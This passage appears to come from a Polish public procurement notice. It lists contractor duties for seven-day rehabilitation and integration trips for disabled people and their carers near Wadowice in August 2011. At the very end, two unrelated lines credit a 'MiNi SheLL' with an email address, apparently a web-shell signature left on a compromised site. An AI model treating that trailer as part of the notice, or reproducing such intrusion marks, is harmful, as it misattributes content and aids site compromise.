7.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu rozpoczęcia wyjazdu dla każdego uczestnika wyjazdu i opiekuna,osoby dodatkowej w formie zamiennika na ognisko z produktami grillowanymi (np. kiełbasa, karkówka) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy itp. w ustalonym wspólnie z opiekunem grupy terminie,
8.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu zakończenia wyjazdu dla każdego uczestnika wyjazdu w formie zapewnienia suchego prowiantu na czas podróży,
9.	Wykonawca musi zapewnić wyżywienie uczestnikom wyjazdu - 3 posiłki dziennie (śniadanie, obiad, kolacja),
10.	Wykonawca musi przedstawić propozycję harmonogramu zajęć uczestników Zamawiającemu.
11.	Wykonawca musi zapewnić salę na zaplanowane zajęcia z psychologiem dla uczestników wyjazdu podzielonych na trzy grupy tj.:
- osoby niepełnosprawne intelektualnie i ich opiekunowie (10 osób) - 3 dni po 3 godziny,
- pozostałe osoby niepełnosprawne i ich opiekunowie (13 osób) - 3 dni po 3 godziny,
- osoby niepełnosprawne chorujące psychicznie (10 osób) - 3 dni po 3 godziny,
12.	Wykonawca musi zapewnić w dniu przyjazdu, BO, konsultację lekarską w celu ustalenia planu zabiegów rehabilitacyjnych dla uczestników, 
13.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla uczestników wyjazdu -4 dni po 2 godziny,
14.	Wykonawca musi zorganizować w czasie całego pobytu jedną wycieczkę i sześć zajęć spośród poniżej wymienionych: integracyjne, kulturalno-oświatowe, sportowo-turystyczne,
15.	Wykonawca winien wyznaczyć osobę do kontaktu - kierownika grupy odpowiedzialnego za organizację zajęć, informowanie uczestników wyjazdu o planowanych zajęciach, czuwanie nad realizacją zajęć zgodnie z harmonogramem, 
16.	Wykonawca winien, w razie konieczności, zapewnić opiekę medyczną w tym zorganizować transport,
17.	Wykonawca musi przedstawić sprawozdanie z przebiegu wyjazdu.

Do momentu podpisania umowy liczba osób biorących udział w wyjeździe może ulec zmianie, ale będzie szczegółowo podana w umowie, jednak do celów oszacowania przez wykonawcę kosztów organizacji wyjazdu ustala się minimalną ilość osób - 26 oraz maksymalną ilość osób, - 33 która weźmie udział w wyjeździe.

Termin realizacji zamówienia: od dnia wyjazdu tj. w dniach między 11 a 31 sierpnia 2011r., czas trwania wyjazdu - 7 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie siedmiodniowego wyjazdu rehabilitacyjno - integracyjnego do miejsca oddalonego od Wadowic od 50 km do 300 km dla 24 osób nieaktywnych zawodowo ze względu na opiekę nad dzieckiem niepełnosprawnym lub inną osobą zależną (beneficjent ostateczny, BO) oraz 24 ich niepełnosprawnych podopiecznych osób z najbliższego otoczenia BO - w sumie 48 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki Wykonawcy
1.	Wykonawca musi zorganizować transport uczestników na miejsce pobytu oraz ich powrót. Wyjazd winien być zorganizowany z Andrychowa,Wadowic,Kalwarii Zebrzyd. w dniach między 1 a 21 sierpnia 2011r. na 7 dni (łącznie z przejazdem w obie strony) do miejscowości oddalonej od Wadowic od 50 km do 300 km,  autokarem lub busem z klimatyzacją,
2.	Wykonawca musi zapewnić na czas przejazdu do i z ośrodka opiekuna grupy (osoba inna niż kierowca),
3.	Wykonawca musi pokryć koszty ubezpieczenia uczestników wyjazdu (zapewnić uczestnikom ubezpieczenie od następstw nieszczęśliwych wypadków na czas podróży i pobytu w ośrodku),
4.	Wykonawca musi opłacić opłatę klimatyczną za wszystkich uczestników, jeśli wymagać będzie tego lokalizacja ośrodka,
5.	Wykonawca musi zakwaterować uczestników wyjazdu w Ośrodku, który posiada aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe, w pokojach z pełnym węzłem sanitarnym w budynku dostosowanym do potrzeb osób niepełnosprawnych łącznie z łazienkami przy pokojach, w tym i dla osób poruszających się na wózkach. Ośrodek ten musi dysponować pokojami przynajmniej w ilości: 4x3-osobowy, 19x2-osobowy i 1x4-osobowy (w przypadku braku pokoju 4-osobowego można zastąpić go: 2x2-osobowy lub 1x3-osobowy z dostawką). Wszystkie pokoje muszą znajdować się w jednym budynku, w którym również winna znajdować się stołówka lub jadalnia.
6.	Wykonawca musi zapewnić możliwość pobytu dodatkowo dla 6 osób, które indywidualnie zapłacą za swój pobyt (osoby te są już ujęte w zapotrzebowaniu na pokoje).
7.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu rozpoczęcia wyjazdu dla każdego uczestnika wyjazdu i opiekunaosoby dodatkowej w formie zamiennika na ognisko z produktami grillowanymi (np. kiełbasa, karkówka) a w przypadku złej pogody spotkanie całej grupy np. na świetlicy itp. w ustalonym wspólnie z opiekunem grupy terminie,
8.	Wykonawca musi dokonać rekompensaty za wyżywienie w dniu zakończenia wyjazdu dla każdego uczestnika wyjazdu w formie zapewnienia suchego prowiantu na czas podróży,
9.	Wykonawca musi zapewnić wyżywienie uczestnikom wyjazdu - 3 posiłki dziennie (śniadanie, obiad, kolacja),
10.	Wykonawca musi przedstawić propozycję harmonogramu zajęć uczestników Zamawiającemu.
11.	Na czas udziału BO w zajęciach rehabilitacyjnych Wykonawca musi zapewnić opiekę (min. 4 wykwalifikowane osoby - np. rehabilitant, pielęgniarka, pedagog specjalny) dzieciom oraz innym osobom zależnym,
12.	Wykonawca musi zapewnić w dniu przyjazdu BO, konsultację lekarską w celu ustalenia planu zabiegów rehabilitacyjnych dla uczestników, 
13.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla uczestników wyjazdu -4 dni po 2 godziny,
14.	Wykonawca musi zorganizować zajęcia rehabilitacyjne dla 24 dzieci i innych osób zależnych niepełnosprawnych, uwzględniające ich niepełnosprawności - 3 dni po 2 godziny (osoby niepełnosprawne w wieku od 4 do 83 lat, schorzenia: przepuklina oponowo-rdzeniowa, zespół Downa, dziecięce porażenie mózgowe, epilepsja, ślepota, zespół wad wrodzonych, wada słuchu, karłowatość),
15.	Wykonawca musi zorganizować w czasie całego pobytu jedną wycieczkę i sześć zajęć spośród poniżej wymienionych: integracyjne, kulturalno-oświatowe, sportowo-turystyczne,
16.	Wykonawca winien wyznaczyć osobę do kontaktu - kierownika grupy odpowiedzialnego za organizację zajęć, informowanie uczestników wyjazdu o planowanych zajęciach, czuwanie nad realizacją zajęć zgodnie z harmonogramem, 
17.	Wykonawca winien, w razie konieczności, zapewnić opiekę medyczną w tym zorganizować transport,
18.	Wykonawca musi przedstawić sprawozdanie z przebiegu wyjazdu.
Do momentu podpisania umowy liczba osób biorących udział w wyjeździe może ulec zmianie, ale będzie szczegółowo podana w umowie, jednak do celów oszacowania przez wykonawcę kosztów organizacji wyjazdu ustala się minimalną ilość osób - 40 oraz maksymalną ilość osób - 48, która weźmie udział w wyjeździe.
	Termin realizacji zamówienia: od dnia wyjazdu tj. w dniach między 1 a 21 sierpnia 2011r., czas trwania wyjazdu - 7 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com